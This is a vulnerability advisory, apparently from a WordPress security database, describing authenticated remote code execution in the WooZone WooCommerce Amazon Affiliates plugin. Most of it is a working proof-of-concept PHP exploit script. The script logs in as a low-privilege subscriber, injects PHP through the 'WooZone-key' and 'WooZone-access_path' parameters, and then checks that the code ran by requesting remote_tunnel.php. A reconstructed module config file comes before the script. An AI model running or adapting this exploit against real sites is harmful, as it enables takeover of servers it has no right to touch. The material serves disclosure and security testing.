WooZone - WooCommerce Amazon Affiliates [Authenticated Remote Code Execution]

This vulnerability is related to DWF-2017-87001, check WooZone - WooCommerce Amazon Affiliates [Arbitrary File Upload] for details.

Description

Further investigation by MattR revealed that the param $_REQUEST['WooZone-key'] can be used for code injection in modules/remote_support/remote_init.php file. Checking this part of code I discovered that both this and the $_REQUEST['WooZone-access_path'] are vulnerable to this attack.

In this case instead of first updating $_REQUEST['WooZone-key'] and then using that key to update a file, we inject code in the vulnerable params and the we request the woozone/modules/remote_support/remote_tunnel.php file in order to execute the code.

PoC

The source files were provided by Brad from a hacked website. It seems like remote_support module is missing config.php file. Without it the module won’t load and this attack will fail. The contents of config.php file should look like this:

<?php
echo json_encode(
	array(
		'remote_support' => array(
			'version' => '1.0',
			'menu' => array(
				'order' => 20,
				'show_in_menu' => true,
				'title' => 'Remote support',
				'icon' => 'images/16.png'
			),
			/*'in_dashboard' => array(
				'icon' 	=> 'images/32.png',
				'url'	=> admin_url("admin.php?page=WooZone_remote_support")
			),*/
			'help' => array(
				'type' => 'remote',
				'url' => 'http://docs.aa-team.com/woocommerce-amazon-affiliates/documentation/price_select/'
			),
			'description' => "....",
			'module_init' => 'init.php',
			'load_in' => array(
                'backend' => array(
                    'admin.php?page=WooZone_remote_support',
                    'admin-ajax.php'
                ),
                'frontend' => false
			),
			'javascript' => array(
				'admin',
				'hashchange',
				'tipsy',
				'thickbox'
			),
			'css' => array(
				'admin',
				'tipsy'
			)
		)
	)
);

Actual exploit:

#!/usr/bin/env php
<?php
/*******************************************************************************
 * WooZone - WooCommerce Amazon Affiliates [Remote Code Execution]
 *
 * Exploit Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
 * To install deps run `composer install`
 ******************************************************************************/

require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Session;
use Wordfence\ExKit\WPAuthentication;

Config::get('url.base', null, true, 'Enter the site URL')
|| ExitCodes::exitWithFailedPrecondition('You must enter a valid URL');

$s = new Session();
$s->XDebugOn();

Cli::writeInfo('Authenticating...');
WPAuthentication::logInAsUserRole($s, WPAuthentication::USER_ROLE_SUBSCRIBER);

$vulnerableParams = ['WooZone-access_path', 'WooZone-key'];

foreach ( $vulnerableParams as $vulnerable_param ) {
    Cli::writeInfo('Exploiting using $_REQUEST['.$vulnerable_param.'] param...');

    $identifier = uniqid();

    $postData = [
        'action' => 'WooZoneRemoteSupportRequest',
        'sub_actions' => 'access_details',
        'params' => http_build_query([
            'WooZone-allow_file_remote' => 'yes',
            $vulnerable_param => '"); die("'.$identifier.'");/*'
        ]),
    ];

    $r = $s->post(Endpoint::adminAjaxURL(), [], $postData);

    $rJson = @json_decode($r->body);

    if(!$r->success || !$rJson || !isset($rJson->status) || $rJson->status != 'valid'){
        ExitCodes::exitWithFailed('Failed to exploit');
    }

    Cli::writeInfo('Validating exploit...');

    $fileUrl = Endpoint::pluginsURL().'/woozone/modules/remote_support/remote_tunnel.php';

    $r = Requests::get($fileUrl);

    if(!$r->success || $r->body != $identifier){
        Cli::writeError('Failed to validate exploitation through $_REQUEST['.$vulnerable_param.'] param');
    } else {
        Cli::writeSuccess('Successful exploitation using $_REQUEST['.$vulnerable_param.'] param');
    }
}

ExitCodes::exitWithInformational('Exploitation attempt finished');

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX